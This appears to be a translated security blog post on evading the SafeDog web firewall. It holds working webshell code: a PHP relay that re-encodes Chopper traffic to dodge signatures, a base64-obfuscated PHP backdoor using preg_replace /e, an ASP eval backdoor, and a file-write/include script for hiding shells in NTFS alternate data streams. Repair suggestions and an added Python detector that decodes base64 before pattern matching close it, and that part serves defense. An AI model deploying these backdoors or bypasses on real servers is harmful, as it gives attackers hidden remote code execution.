Penetration Test On SafeDog

Source: Internet
Author: User

0x00 Breaking through SafeDog with Chopper (caidao)

# Principle

BAD:  caidao -> safedog -X-> backdoor
GOOD: caidao -> middle -> safedog -> backdoor -> middle -> caidao

The data sent by Chopper (caidao, the "kitchen knife") is intercepted by SafeDog, because the traffic Chopper sends is already in SafeDog's signature set. But if we put a script between Chopper and SafeDog that encrypts the data, we can modify and encrypt the original data; that script then sends the data stream on to SafeDog, acting like a proxy. Because there is no matching signature, the stream reaches the shell on the server; the shell decrypts the encrypted data and executes it. After execution it returns the data to the proxy script, which finally streams it back to Chopper.

# Code

# middle.php

```php
<?php
/*
 * Author: Laterain
 * Time: 20130821
 * About: Middle monkey between the hacker and safedog.
 * Just For Fun
 */
$url  = isset($_GET['shell']) ? $_GET['shell'] : '';   // URL of the backdoor behind SafeDog
$pass = isset($_GET['pass'])  ? $_GET['pass']  : '';   // backdoor parameter name
$type = isset($_GET['type'])  ? $_GET['type']  : 'php';
if ($type == 'php') {
    // the stage the PHP backdoor will decode and eval; Chopper's own payload stays in z0
    $shellcode = base64_encode('@eval(base64_decode($_POST[z0]));');
} elseif ($type == 'asp') {
    $shellcode = base64_encode($_POST[$pass]);
}
$shellcode = $pass.'='.urlencode($shellcode);
// forward every other POST field from Chopper unchanged
foreach ($_POST as $key => $value) {
    if ($key == $pass) {
        continue;
    }
    $shellcode .= '&'.$key.'='.urlencode($value);
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $shellcode);
$data = curl_exec($ch);
curl_close($ch);
print_r($data);   // relay the backdoor's response back to Chopper
?>
```

# PHP backdoor

```php
<?php
$key = "hack";
// 'L2EvZQ==' decodes to '/a/e' and the second literal to
// 'eval(base64_decode($_REQUEST[$key]))'. The /e modifier makes preg_replace
// evaluate the replacement as PHP (deprecated in PHP 5.5, removed in PHP 7.0),
// so the base64 wrapping keeps the eval out of plain-text signatures.
preg_replace(base64_decode('L2EvZQ=='), base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFska2V5XSkp'), 'a');
?>
```


# ASP backdoor

```asp
<%
Option Explicit
Const BASE_64_MAP_INIT = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim Base64EncMap(63)
Dim Base64DecMap(127)
Dim code

' initialization function
Public Sub initCodecs()
    ' initialize variables
    Dim max, idx
    max = Len(BASE_64_MAP_INIT)
    For idx = 0 To max - 1
        Base64EncMap(idx) = Mid(BASE_64_MAP_INIT, idx + 1, 1)
    Next
    For idx = 0 To max - 1
        Base64DecMap(Asc(Base64EncMap(idx))) = idx
    Next
End Sub

' base64 encryption function
Public Function base64Encode(plain)
    If Len(plain) = 0 Then
        base64Encode = ""
        Exit Function
    End If
    Dim ret, ndx, by3, first, second, third
    by3 = (Len(plain) \ 3) * 3
    ndx = 1
    Do While ndx <= by3
        first  = Asc(Mid(plain, ndx + 0, 1))
        second = Asc(Mid(plain, ndx + 1, 1))
        third  = Asc(Mid(plain, ndx + 2, 1))
        ret = ret & Base64EncMap((first \ 4) And 63)
        ret = ret & Base64EncMap(((first * 16) And 48) + ((second \ 16) And 15))
        ret = ret & Base64EncMap(((second * 4) And 60) + ((third \ 64) And 3))
        ret = ret & Base64EncMap(third And 63)
        ndx = ndx + 3
    Loop
    If by3 < Len(plain) Then
        first = Asc(Mid(plain, ndx + 0, 1))
        ret = ret & Base64EncMap((first \ 4) And 63)
        If (Len(plain) Mod 3) = 2 Then
            second = Asc(Mid(plain, ndx + 1, 1))
            ret = ret & Base64EncMap(((first * 16) And 48) + ((second \ 16) And 15))
            ret = ret & Base64EncMap((second * 4) And 60)
        Else
            ret = ret & Base64EncMap((first * 16) And 48)
            ' the "=" padding is left commented out, as in the original
            ret = ret '& "="
        End If
        ret = ret '& "="
    End If
    base64Encode = ret
End Function

' base64 decryption function
Public Function base64Decode(scrambled)
    If Len(scrambled) = 0 Then
        base64Decode = ""
        Exit Function
    End If
    Dim realLen
    realLen = Len(scrambled)
    Do While Mid(scrambled, realLen, 1) = "="
        realLen = realLen - 1
    Loop
    Dim ret, ndx, by4, first, second, third, fourth
    ret = ""
    by4 = (realLen \ 4) * 4
    ndx = 1
    Do While ndx <= by4
        first  = Base64DecMap(Asc(Mid(scrambled, ndx + 0, 1)))
        second = Base64DecMap(Asc(Mid(scrambled, ndx + 1, 1)))
        third  = Base64DecMap(Asc(Mid(scrambled, ndx + 2, 1)))
        fourth = Base64DecMap(Asc(Mid(scrambled, ndx + 3, 1)))
        ret = ret & Chr(((first * 4) And 255) + ((second \ 16) And 3))
        ret = ret & Chr(((second * 16) And 255) + ((third \ 4) And 15))
        ret = ret & Chr(((third * 64) And 255) + (fourth And 63))
        ndx = ndx + 4
    Loop
    If ndx < realLen Then
        first  = Base64DecMap(Asc(Mid(scrambled, ndx + 0, 1)))
        second = Base64DecMap(Asc(Mid(scrambled, ndx + 1, 1)))
        ret = ret & Chr(((first * 4) And 255) + ((second \ 16) And 3))
        If realLen Mod 4 = 3 Then
            third = Base64DecMap(Asc(Mid(scrambled, ndx + 2, 1)))
            ret = ret & Chr(((second * 16) And 255) + ((third \ 4) And 15))
        End If
    End If
    base64Decode = ret
End Function

' initialize, then decode the "hack" parameter and execute it
Call initCodecs
code = Request("hack")
code = base64Decode(code)
eval code
%>
```
0x01 Breaking through SafeDog's malicious-code interception

# Principle

php://input is not checked, so malicious code can be written from it. Once the shell has been written as an NTFS alternate data stream (ADS), it can be pulled in with include.

# base.php
```php
<?php
if (isset($_GET['inc'])) {
    // include whatever path the client names
    include($_GET['inc']);
} elseif (isset($_GET['path'])) {
    // write the raw request body (php://input) to whatever path the client names
    fwrite(fopen($_GET['path'], "w"), file_get_contents("php://input"));
} else {
    echo __FILE__;
}
?>
```
# Repair suggestions

1. With arbitrary encryption and obfuscation in the middle script and matching decryption in the backdoor, it is hard for the SafeDog vendor to solve the problem of blocking Chopper traffic itself, but they can start from the backdoor: enhanced scanning and detection of server-side backdoors can effectively prevent this problem.
2. Getting the shell through inclusion can only be addressed by strengthening the signatures.
3. Backdoors created through ADS cannot be found. My idea is that the server itself should not allow access to files created as ADS; they can only be reached through inclusion, so including them (include, require and the like) should be classified as dangerous. Of course, finding them directly would be better.
4. Filter the content of php://input.

PS: I thought I was the first to find the php://input trick, but yesterday I saw it being used on FreeBuf; that was a blow... So I'm posting it anyway...
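As an added example (not the article's code and not SafeDog's), the following Python shows the check that suggestions 1 and 4 call for: peel one base64 layer before matching signatures, both on PHP files found on the server and on request bodies passing through a WAF. The sample inputs are copies of the article's two PHP snippets plus a request body constructed in the shape middle.php produces, with a harmless statement standing in for Chopper's payload; the parameter name `hack` comes from the article, and the pattern names and helper names are this example's own.

```python
"""Signature checks that decode one base64 layer before matching.

Added example for this article (not the article's own code). Sample inputs are
copies of the article's two PHP snippets and a constructed POST body shaped the
way middle.php shapes one.
"""
import base64
import re
from typing import Optional
from urllib.parse import parse_qs, quote

# Patterns a server-side backdoor scanner or a WAF rule would look for in PHP.
DANGER_PATTERNS = {
    "eval": re.compile(r"\beval\s*\("),
    # preg_replace with the /e modifier evaluates the replacement as PHP
    "preg_replace_e": re.compile(r"""preg_replace\s*\(\s*['"]/[^'"]*/[a-zA-Z]*e[a-zA-Z]*['"]"""),
    "include_from_request": re.compile(r"\b(include|require)(_once)?\s*\(\s*\$_(GET|POST|REQUEST)\b"),
    "php_input_to_file": re.compile(r"fwrite\s*\(.*php://input", re.S),
}
# base64_decode('...') with a literal argument, and bare base64-looking literals
B64_CALL = re.compile(r"""base64_decode\s*\(\s*['"]([A-Za-z0-9+/]+={0,2})['"]\s*\)""")
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{8,}={0,2})['"]""")


def _decode(value: str) -> Optional[str]:
    """Strict base64 decode to text, or None if the value is not base64 text."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def decode_b64_literals(src: str) -> str:
    """Replace base64_decode('lit') calls and base64-looking literals in PHP
    source with the decoded text, so signatures see what will actually run."""
    def repl(m):
        decoded = _decode(m.group(1))
        return m.group(0) if decoded is None else "'" + decoded + "'"
    return B64_LITERAL.sub(repl, B64_CALL.sub(repl, src))


def scan_php_source(src: str) -> list:
    """Names of DANGER_PATTERNS that match after one base64 layer is peeled."""
    text = decode_b64_literals(src)
    return sorted(name for name, rx in DANGER_PATTERNS.items() if rx.search(text))


def naive_signature_hit(body: str) -> bool:
    """What a rule that only matches the literal bytes of the body sees."""
    return "eval(" in body


def inspect_post_body(body: str) -> dict:
    """Base64-decode every form value (one layer) and scan it as PHP; returns
    {parameter: [pattern names]} for the values that carry dangerous code."""
    findings = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            decoded = _decode(value)
            hits = scan_php_source(value if decoded is None else decoded)
            if hits:
                findings.setdefault(name, []).extend(hits)
    return findings


# --- sample inputs ---------------------------------------------------------
# copy of the article's PHP backdoor
PAGE_PHP_BACKDOOR = """<?php
$key = "hack";
preg_replace(base64_decode('L2EvZQ=='),base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFska2V5XSkp'),'a');
?>"""
# copy of the article's base.php
PAGE_BASE_PHP = """<?php
if (isset($_GET['inc'])) { include($_GET['inc']); }
elseif (isset($_GET['path'])) { fwrite(fopen($_GET['path'], "w"), file_get_contents("php://input")); }
else { echo __FILE__; }
?>"""
# constructed POST body in the shape middle.php produces: the stage is base64-encoded
# under the backdoor's parameter name, and Chopper's own field z0 (here just a
# harmless statement) is forwarded as-is
_STAGE = base64.b64encode(b"@eval(base64_decode($_POST[z0]));").decode()
SAMPLE_BODY = "hack=" + quote(_STAGE) + "&z0=" + quote(base64.b64encode(b"echo 1;").decode())

if __name__ == "__main__":
    print(scan_php_source(PAGE_PHP_BACKDOOR))   # ['eval', 'preg_replace_e']
    print(scan_php_source(PAGE_BASE_PHP))       # ['include_from_request', 'php_input_to_file']
    print(naive_signature_hit(SAMPLE_BODY))     # False
    print(inspect_post_body(SAMPLE_BODY))       # {'hack': ['eval']}
```

A plain `eval(` rule misses both the stored backdoor and the relayed body, because the dangerous text only exists after decoding; decoding one layer is what exposes it. The same one-layer decode applies to the ASP variant, which would need VBScript `eval`/`execute` patterns that this example leaves out, and an attacker who adds a second layer (or a different encoding) is exactly why suggestion 1 treats the traffic signature as the weaker control and puts the weight on finding the backdoor file itself.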

Author: laterain from 90sec
